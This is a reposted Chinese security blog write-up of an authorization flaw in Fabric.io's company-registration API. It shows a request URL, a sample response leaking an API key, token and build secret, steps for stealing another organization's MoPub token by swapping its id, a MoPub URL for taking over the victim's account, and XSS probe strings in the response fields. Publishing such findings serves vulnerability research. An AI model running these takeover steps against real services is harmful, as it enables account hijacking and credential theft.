api漏洞系列-一个越权漏洞

admin 2022年7月26日23:28:09评论52 views字数 1261阅读4分12秒阅读模式

前言

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

主要逻辑

Fabric平台帮助你构建更稳定的应用程序,通过世界上最大的移动广告交易平台产生收入,并使你能够利用Twitter的登录系统和丰富的实时内容,实现更大的分发和更简单的身份识别; 在注册功能(主要是为公司注册)中,缺少适当的授权检查,允许任何用户窃取API令牌。

请求

URL GET/POST data: POST METHOD:

https://fabric.io/img-srcx-onerrorprompt15/android/apps/app.myapplication/mopub

api漏洞系列-一个越权漏洞

响应:

{
"mopub_identity": {
"id":"5496c76e8b15dabe9c0006d7",
"confirmed":true,
"primary":false,
"serv ice":"mopub",
"token":"35592"
},
"organization":{
"id":"5460d2394b793294df01104a",
"name":"u003Ca href="javascript:alert(1);"u003Esu003C/au003Eu003Ch1u003Etestu003C/h1u003E",
"al ias":"img-srcx-onerrorprompt1s- projects2",
"api_key":"8590313c7382375063c2fe279a4487a98387767a",
"enrollments":{
"beta_ distribution":"true"
},
"accounts_count":3,
"apps_counts":{
"android":2
},
"sdk_organization":true,
" build_secret":"5ef0323f62d71c475611a635ea09a3132f037557d801503573b643ef8ad82054",
" mopub_id":"33525"
}
}

复现步骤

1.创建两个账户

2.记下这两个账户的公司(organization)id

3.账户A用公司B的id重复上述请求

api漏洞系列-一个越权漏洞

4.你就可以窃取受害者mopub API令牌

账户劫持

1.用上述方法使用fabric.io从受害者那里窃取到build secret

2.使用下面的URL进入受害者mopub帐户。https://app.mopub.com/complete/htsdk/?code=[build secret]&next=%2d replace [build secret] with token you extracted from step one

用从第一步提取的令牌取代build secret

3.现在你将可以访问受害者mopub的帐户,他的所有应用程序/组织将在fabric中显示出来

api漏洞系列-一个越权漏洞


原文始发于微信公众号(迪哥讲事):api漏洞系列-一个越权漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月26日23:28:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   api漏洞系列-一个越权漏洞http://cn-sec.com/archives/1203001.html

发表评论

匿名网友 填写信息